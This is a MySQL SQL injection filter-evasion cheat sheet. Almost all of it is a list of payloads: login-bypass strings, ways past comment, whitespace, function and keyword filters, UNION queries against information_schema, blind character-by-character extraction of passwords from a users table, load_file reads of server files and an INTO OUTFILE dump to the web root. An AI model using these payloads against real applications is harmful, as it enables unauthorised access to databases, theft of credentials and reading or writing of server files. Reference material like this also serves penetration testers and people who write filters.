SQLi filter evasion cheat sheet (MySQL)

1. [×]Basic filter[×[
2.  
3. Comments
4. ‘ or 1=1#
5. ‘ or 1=1– –
6. ‘ or 1=1/* (MySQL < 5.1)
7. ' or 1=1;%00
8. ' or 1=1 union select 1,2 as `
9. ' or#newline
10. 1='1
11. ' or– -newline
12. 1='1
13. ' /*!50000or*/1='1
14. ' /*!or*/1='1
15.  
16. Prefixes
17. + – ~ !
18. ‘ or –+2=- -!!!’2
19.  
20. Operators
21. ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
22.  
23. Whitespaces
24. %20 %09 %0a %0b %0c %0d %a0 /**/
25. ‘or+(1)sounds/**/like“1“–%a0-
26. ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
27.  
28. Strings with quotes
29. SELECT ‘a’
30. SELECT “a”
31. SELECT n’a’
32. SELECT b’1100001′
33. SELECT _binary’1100001′
34. SELECT x’61’
35.  
36. Strings without quotes
37. ‘abc’ = 0x616263
38.  
39. Aliases
40. select pass as alias from users
41. select pass aliasalias from users
42. select pass`alias alias`from users
43.  
44. Typecasting
45. ‘ or true = ‘1 # or 1=1
46. ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
47. ‘ or ‘1 # or true
48.  
49. Compare operator typecasting
50. select * from users where ‘a’=’b’=’c’
51. select * from users where (‘a’=’b’)=’c’
52. select * from users where (false)=’c’
53. select * from users where (0)=’c’
54. select * from users where (0)=0
55. select * from users where true
56. select * from users
57.  
58. Authentication bypass ‘=’
59. select * from users where name = ”=”
60. select * from users where false = ”
61. select * from users where 0 = 0
62. select * from users where true
63. select * from users
64.  
65. Authentication bypass ‘-‘
66. select * from users where name = ”-”
67. select * from users where name = 0-0
68. select * from users where 0 = 0
69. select * from users where true
70. select * from users
71.  
72. [×]Function filter[×[
73.  
74. General function filtering
75. ascii (97)
76. load_file/*foo*/(0x616263)
77.  
78. Strings with functions
79. ‘abc’ = unhex(616263)
80. ‘abc’ = char(97,98,99)
81. hex(‘a’) = 61
82. ascii(‘a’) = 97
83. ord(‘a’) = 97
84. ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
85.  
86. Strings extracted from gadgets
87. collation(\N) // binary
88. collation(user()) // utf8_general_ci
89. @@time_format    // %H:%i:%s
90. @@binlog_format  // MIXED
91. @@version_comment    // MySQL Community Server (GPL)
92. dayname(from_days(401))  // Monday
93. dayname(from_days(403))  // Wednesday
94. monthname(from_days(690)) // November
95. monthname(from_unixtime(1))  // January
96. collation(convert((1)using/**/koi8r))    // koi8r_general_ci
97. (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
98.  
99. Special characters extracted from gadgets
100. aes_encrypt(1,12)    // 4çh±{?”^c×HéÉEa
101. des_encrypt(1,2)     // ‚GÒ/ïÖk
102. @@ft_boolean_syntax  // + -><()~*:""&|
103. @@date_format    // %Y-%m-%d
104. @@innodb_log_group_home_dir  // .\
105.  
106. Integer representations
107. false: 0
108. true: 1
109. true+true: 2
110. floor(pi()): 3
111. ceil(pi()): 4
112. floor(version()): 5
113. ceil(version()): 6
114. ceil(pi()+pi()): 7
115. floor(version()+pi()): 8
116. floor(pi()*pi()): 9
117. ceil(pi()*pi()): 10
118. concat(true,true): 11
119. ceil(pi()*pi())+true: 11
120. ceil(pi()+pi()+version()): 12
121. floor(pi()*pi()+pi()): 13
122. ceil(pi()*pi()+pi()): 14
123. ceil(pi()*pi()+version()): 15
124. floor(pi()*version()): 16
125. ceil(pi()*version()): 17
126. ceil(pi()*version())+true: 18
127. floor((pi()+pi())*pi()): 19
128. ceil((pi()+pi())*pi()): 20
129. ceil(ceil(pi())*version()): 21
130. concat(true+true,true): 21
131. ceil(pi()*ceil(pi()+pi())): 22
132. ceil((pi()+ceil(pi()))*pi()): 23
133. ceil(pi())*ceil(version()): 24
134. floor(pi()*(version()+pi())): 25
135. floor(version()*version()): 26
136. ceil(version()*version()): 27
137. ceil(pi()*pi()*pi()-pi()): 28
138. floor(pi()*pi()*floor(pi())): 29
139. ceil(pi()*pi()*floor(pi())): 30
140. concat(floor(pi()),false): 30
141. floor(pi()*pi()*pi()): 31
142. ceil(pi()*pi()*pi()): 32
143. ceil(pi()*pi()*pi())+true: 33
144. ceil(pow(pi(),pi())-pi()): 34
145. ceil(pi()*pi()*pi()+pi()): 35
146. floor(pow(pi(),pi())): 36
147.  
148. @@new: 0
149. @@log_bin: 1
150.  
151. !pi(): 0
152. !!pi(): 1
153. true-~true: 3
154. log(-cos(pi())): 0
155. -cos(pi()): 1
156. coercibility(user()): 3
157. coercibility(now()): 4
158.  
159. minute(now())
160. hour(now())
161. day(now())
162. week(now())
163. month(now())
164. year(now())
165. quarter(now())
166. year(@@timestamp)
167. crc32(true)
168.  
169. Extract substrings
170. substr(‘abc’,1,1) = ‘a’
171. substr(‘abc’ from 1 for 1) = ‘a’
172. substring(‘abc’,1,1) = ‘a’
173. substring(‘abc’ from 1 for 1) = ‘a’
174. mid(‘abc’,1,1) = ‘a’
175. mid(‘abc’ from 1 for 1) = ‘a’
176. lpad(‘abc’,1,space(1)) = ‘a’
177. rpad(‘abc’,1,space(1)) = ‘a’
178. left(‘abc’,1) = ‘a’
179. reverse(right(reverse(‘abc’),1)) = ‘a’
180. insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
181. space(0) = trim(version()from(version()))
182.  
183. Search substrings
184. locate(‘a’,’abc’)
185. position(‘a’,’abc’)
186. position(‘a’ IN ‘abc’)
187. instr(‘abc’,’a’)
188. substring_index(‘ab’,’b’,1)
189.  
190. Cut substrings
191. length(trim(leading ‘a’ FROM ‘abc’))
192. length(replace(‘abc’, ‘a’, ”))
193.  
194. Compare strings
195. strcmp(‘a’,’a’)
196. mod(‘a’,’a’)
197. find_in_set(‘a’,’a’)
198. field(‘a’,’a’)
199. count(concat(‘a’,’a’))
200.  
201. String length
202. length()
203. bit_length()
204. char_length()
205. octet_length()
206. bit_count()
207.  
208. String case
209. ucase
210. lcase
211. lower
212. upper
213. password(‘a’) != password(‘A’)
214. old_password(‘a’) != old_password(‘A’)
215. md5(‘a’) != md5(‘A’)
216. sha(‘a’) != sha(‘A’)
217. aes_encrypt(‘a’) != aes_encrypt(‘A’)
218. des_encrypt(‘a’) != des_encrypt(‘A’)
219.  
220. [×]Keyword filter[×]
221.  
222. Connected keyword filtering
223. (0)union(select(table_name),column_name,…
224. 0/**/union/*!50000select*/table_name`foo`/**/…
225. 0%a0union%a0select%09group_concat(table_name)….
226. 0’union all select all`table_name`foo from`information_schema`. `tables`
227.  
228. OR, AND
229. ‘||1=’1
230. ‘&&1=’1
231. ‘=’
232. ‘-‘
233.  
234. OR, AND, UNION
235. ‘ and (select pass from users limit 1)=’secret
236.  
237. OR, AND, UNION, LIMIT
238. ‘ and (select pass from users where id =1)=’a
239.  
240. OR, AND, UNION, LIMIT, WHERE
241. ‘ and (select pass from users group by id having id = 1)=’a
242.  
243. OR, AND, UNION, LIMIT, WHERE, GROUP
244. ‘ and length((select pass from users having substr(pass,1,1)=’a’))
245.  
246. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
247. ‘ and (select substr(group_concat(pass),1,1) from users)=’a
248. ‘ and substr((select max(pass) from users),1,1)=’a
249. ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
250.  
251. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
252. ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
253. ‘=” into outfile ‘/var/www/dump.txt
254.  
255. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
256. ‘ procedure analyse()#
257. ‘-if(name=’Admin’,1,0)#
258. ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#
259.  
260. Control flow
261. case ‘a’ when ‘a’ then 1 [else 0] end
262. case when ‘a’=’a’ then 1 [else 0] end
263. if(‘a’=’a’,1,0)
264. ifnull(nullif(‘a’,’a’),1)